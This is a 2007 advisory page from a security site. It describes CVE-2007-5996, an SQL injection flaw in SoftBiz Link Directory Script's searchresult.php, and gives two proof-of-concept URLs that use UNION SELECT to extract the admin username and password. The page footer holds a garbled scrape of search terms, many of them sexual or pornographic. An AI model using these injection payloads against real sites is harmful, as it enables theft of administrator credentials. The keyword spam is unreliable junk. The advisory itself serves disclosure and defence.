about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Softbiz Link Directory Script SEARCHRESULT.PHP SQL Injection Vulnerability


Title Softbiz Link Directory Script SEARCHRESULT.PHP SQL Injection Vulnerability
Published 2007-11-11-12:00AM
Updated 2007-11-23-08:24PM
Class Input Validation Error
CVE   CVE-2007-5996
Remote  Yes
Local  No
Credit  IRCRASH discovered this vulnerability.
Vulnerable  SoftBiz Link Directory Script 0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:To find username:
http://www.example.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,username,2,3/**/from/**/sblnk_admin/*
To find password:
http://www.example.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,password,2,3/**/from/**/sblnk_admin/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 14:19:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
serv-u 6.0 Charami nice sex Full+sex+v Video sex news for c teen se x Www securi Apache h www.trish pendejitas www.usbfla 200 /compo dogs fucki www.shesex mambo Remo ass neighb ASS BOOB T Erwin Data free blue www,badjoj www.proxyw Www.Video WWW.WOLD.S 200 /compo Wwwsexy.co Erwin Data 200 /compo Budak seko Www.indian sex vdio t556t Www.porn h sex vdio xxxwwe.com sexy image t254t news for c t81t t254t Www.arabse games IceWarp We you www.Fsibol Wwwindians www.sex.sa Wwwindians www.sex .c prorat v1.